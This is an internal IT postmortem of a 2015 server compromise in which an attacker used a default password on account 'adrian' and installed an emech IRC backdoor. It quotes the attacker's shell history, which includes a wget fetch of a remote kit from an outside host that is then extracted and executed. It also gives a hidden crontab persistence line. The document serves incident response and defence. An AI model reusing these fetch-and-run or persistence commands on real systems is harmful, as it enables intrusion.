======Zagnut Compromised====== 5/1/2015 =====Discovery===== Early on Friday morning suspicious files were discovered on Zagnut. I was looking through crontabs looking for a specific entry for the move to AWS when I discovered account 'adrian' had a crontab. Upon looking in it, I found the following entry: %%(bash) * * * * * /dev/shm/.adobe/update >/dev/null 2>&1 %% After noticing that and inspecting #%/dev/shm/.adobe/#%, it was revealed that it was an IRC backdoor that contained its own version of bash(md5 dc7b9585c47ab44830dc84a11e0272fe), which is part of emech([[http://www.symantec.com/security_response/detected_writeup.jsp?name=Linux.RST.A Linux.RST.A or Linux/Mech.A]]. This has potentially compromised various binaries in the system, however, since is was packaged with Emech, I'm leaning on the possibility that it's the Linux/Mech.A variety. I could not determine if emech was running or not. This could be a symptom of a rootkit or just that it was not running. I kill -9ed the PID listed in #%/dev/shm/adobe/m.pid#% just in case and the pid file was never updated after. The history files were never erased, and the only evidence of the cracker's behavior is the following: %% 590 23/04/15 09:20:16 w 591 23/04/15 09:20:20 ps -x 592 23/04/15 09:20:23 uname -a 593 23/04/15 09:20:27 history 594 23/04/15 09:21:34 ls 595 23/04/15 09:21:38 ls -all 596 23/04/15 09:21:44 cd = 597 23/04/15 09:21:48 passwd 598 23/04/15 09:22:12 ifconfig 599 23/04/15 09:22:26 cd /dev/shm 600 23/04/15 09:22:27 ls -a 601 23/04/15 09:22:31 cd " " 602 23/04/15 09:22:33 wget 603 23/04/15 09:22:47 wget ciombi.altervista.org/.adobe.tgz 604 23/04/15 09:22:52 tar zxvf .adobe.tgz 605 23/04/15 09:22:58 rm -rf .adobe.tgz 606 23/04/15 09:23:00 cd .adobe/ 607 23/04/15 09:23:04 chmod +x * 608 23/04/15 09:23:08 ./start fofel 609 23/04/15 09:23:15 ./autorun %% Anything after this is not especially traceable if done via the installed version of bash. /var/log/secure snipped: %% Apr 23 11:20:14 web8 sshd[6803]: Accepted password for adrian from 46.108.172.62 port 26810 ssh2 Apr 23 11:20:14 web8 sshd[6803]: pam_unix(sshd:session): session opened for user adrian by (uid=0) [...] Apr 23 11:21:51 web8 passwd: pam_unix(passwd:chauthtok): authentication failure; logname=adrian uid=503 euid=0 tty=pts/2 ruser= rhost= user=adrian [...] Apr 23 11:22:09 web8 passwd: pam_unix(passwd:chauthtok): password changed for adrian [...] Apr 23 13:34:30 web8 sshd[6803]: pam_unix(sshd:session): session closed for user adrian %% 46.108.172.62 does not appear to be an IP used for a dictionary or brute force attack. It was one shot one kill, possibly from this cracker's home server or home connection. It's a Romanian IP and I doubt reporting anything to their abuse address will matter. =====Remediation===== Account 'adrian' has had it's password reset to a random set of characters. The backdoor daemon, considered not to be running should not be of any threat. I downloaded chkrootkit and compiled from source. It did not reveal any malicious rootkits. rkhunter did discover emech and some others to investigate. Nothing surprising found. #%netstat --numeric-ports -lp#% did not reveal any unusual processes listening on any network ports, either. #%/dev/shm/.adobe#% has been removed. =====Conclusion===== Compromise of the server was able to be completed due to a poor choice of default password and that password never being changed after account delivery. To prevent this in the future, a stronger default password should be set and passwords should be changed immediately upon delivery. After forensic analysis, I'm fairly confident that root was never compromised(even though account 'adrian' had sudo privileges) and the purpose of the intrusion was to run mass checks or some interaction with a bot blacklist. This could have only been the beginning, and there is somewhat of a chance that it could have went further. However, since our move to AWS should be soon, I don't think we need to rush to remove this server entirely. That said, zagnut can not longer be fully trusted and we should intend to move off it as soon as possible. Attached is a tgz of the #%/dev/shm/.adobe/#% directory. **Under no circumstances should any files within the tarball be executed on any machine we care about.** =====Files===== {{ files }} -- CategoryITPostmortems